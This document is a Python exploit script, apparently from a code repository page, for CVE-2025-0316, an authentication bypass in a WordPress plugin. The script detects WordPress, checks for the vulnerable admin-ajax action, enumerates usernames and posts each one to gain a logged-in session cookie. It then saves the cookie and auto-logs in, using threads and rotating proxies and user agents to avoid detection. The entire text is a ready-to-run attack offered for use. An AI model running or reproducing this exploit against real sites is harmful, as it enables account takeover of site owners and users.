README.md
Rendering markdown...
import requests, threading, json, time, argparse, os, random
from urllib.parse import urljoin
from modules.session_handler import save_cookie, auto_login
from modules.recon import enumerate_users, check_plugin
from utils.helpers import load_user_agents, load_proxies, banner
class CVE20250316Exploit:
def __init__(self, target, threads=3, delay=1.5):
self.target = target if target.endswith('/') else target + '/'
self.threads = threads
self.delay = delay
self.user_agents = load_user_agents()
self.proxies = load_proxies()
self.valid_users = []
def verify_target(self):
print("[*] Verifying WordPress target...")
try:
r = requests.get(self.target, timeout=5)
if "wp-content" in r.text or "wp-login" in r.text:
print("[+] WordPress detected.")
return True
except Exception as e:
print(f"[!] Connection error: {e}")
return False
def exploit_user(self, username):
print(f"[*] Trying user: {username}")
session = requests.Session()
session.headers['User-Agent'] = random.choice(self.user_agents)
proxy = {"http": random.choice(self.proxies)} if self.proxies else None
post_data = {
'action': 'wp_dp_enquiry_agent_contact_form_submit_callback',
'user_login': username
}
try:
r = session.post(urljoin(self.target, "wp-admin/admin-ajax.php"), data=post_data, proxies=proxy)
if "wordpress_logged_in" in ''.join(session.cookies.keys()).lower():
print(f"[✓] Exploit success: {username}")
save_cookie(username, session.cookies.get_dict())
auto_login(self.target, session.cookies.get_dict())
except Exception as e:
print(f"[!] Exploit error for {username}: {e}")
def run_threads(self):
print("[*] Launching exploit threads...")
chunk = max(1, len(self.valid_users) // self.threads)
threads = []
for i in range(self.threads):
subset = self.valid_users[i * chunk:(i + 1) * chunk]
t = threading.Thread(target=self.worker, args=(subset,))
t.start()
threads.append(t)
for t in threads:
t.join()
def worker(self, users):
for user in users:
self.exploit_user(user)
time.sleep(self.delay)
def start(self):
banner()
if not self.verify_target():
print("[✘] Target not WordPress. Exiting.")
return
if not check_plugin(self.target):
print("[✘] Vulnerable plugin endpoint not found.")
return
self.valid_users = enumerate_users(self.target)
if not self.valid_users:
print("[!] No valid usernames discovered.")
return
self.run_threads()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="CVE-2025-0316 WordPress Exploit")
parser.add_argument("-u", "--url", help="Target site URL", required=True)
parser.add_argument("-t", "--threads", type=int, default=3)
parser.add_argument("-d", "--delay", type=float, default=1.5)
args = parser.parse_args()
exploit = CVE20250316Exploit(args.url, args.threads, args.delay)
exploit.start()